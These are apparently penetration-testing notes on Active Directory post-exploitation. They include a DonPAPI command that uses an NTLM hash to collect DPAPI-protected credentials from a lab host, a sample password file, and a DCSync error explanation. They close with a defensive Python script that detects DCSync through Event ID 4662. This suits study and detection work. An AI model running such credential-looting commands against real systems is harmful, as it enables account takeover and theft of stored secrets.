Post Exploitation & Looting

Tbd

Looting secrets with DonPAPI

Important

  • You need to provide a password file (one username:password per line) so DonPAPI can decrypt the collected DPAPI masterkeys and the credential blobs they protect.
  • Folders and files under C:\Users\<user>\AppData\Local\Microsoft\Credentials are hidden. Use dir /a (cmd) or Get-ChildItem -Force (PowerShell) to see them.

donpapi collect -t target.lab.local -u adminuser -H ab7b75ff84475be2e8c4dcb7390955c3:ab7b75ff84475be2e8c4dcb7390955c3 -d lab.local --pwdfile ./creds.txt

Example pwdfile (creds.txt), one username:password per line:

jane.doe:World123!
octave:RubberTrain99
john.elton:Ilovemusic1723

Ref: https://www.thehacker.recipes/ad/movement/credentials/dumping/dpapi-protected-secrets#practice

DCSync

Errors

The distinguished name specified for this replication operation is invalid.

This means the account you are running as lacks the replication permissions that DCSync requires on the domain.
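From the defender's side, the same replication rights that a DCSync attempt needs are what show up in Security Event ID 4662 when they are exercised. The script below is an added example (not from these notes or the linked blog): it parses constructed 4662 records in JSON-lines form and flags any account that is neither a DC machine account nor on an allowlist but still read directory changes; the sample records, the JSON layout and the allowlist name are assumptions.

```python
import json
import re

# Extended-right GUIDs recorded in the Properties field of Security Event
# ID 4662 when a principal reads directory changes (what DCSync relies on).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-fA-F]{8}(?:-[0-9a-fA-F]{4}){3}-[0-9a-fA-F]{12}")

# Constructed sample records (JSON lines, not real logs): a DC replicating
# normally, a user account reading changes, a user touching an unrelated
# attribute, and an event that is not 4662 at all.
SAMPLE_EVENTS = """\
{"EventID": 4662, "SubjectUserName": "DC01$", "ObjectType": "domainDNS", "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "adminuser", "ObjectType": "domainDNS", "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "jane.doe", "ObjectType": "user", "Properties": "%%7688 {bf967a86-0de6-11d0-a285-00aa003049e2}"}
{"EventID": 4624, "SubjectUserName": "octave", "Properties": ""}
"""

# Accounts allowed to replicate besides DC machine accounts (names ending in
# "$"), e.g. a directory-sync service account; placeholder name, not real.
DEFAULT_ALLOWLIST = frozenset({"svc_dirsync_PLACEHOLDER"})


def replication_rights_in(properties: str) -> list[str]:
    """Names of the replication rights referenced in a 4662 Properties field."""
    found = {REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
             if g.lower() in REPLICATION_RIGHTS}
    return sorted(found)


def find_dcsync_candidates(jsonl: str, allowlist=DEFAULT_ALLOWLIST):
    """Flag 4662 events where a non-DC, non-allowlisted account used those rights."""
    hits = []
    for line in filter(str.strip, jsonl.splitlines()):
        ev = json.loads(line)
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights_in(ev.get("Properties", ""))
        user = ev.get("SubjectUserName", "")
        if rights and not user.endswith("$") and user not in allowlist:
            hits.append((user, rights))
    return hits
```

Auditing of the domain object (Directory Service Access) must be enabled on the DCs for 4662 to be written at all, so check that before relying on this signal.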

Ref: https://blog.spookysec.net/domain-controller-sync/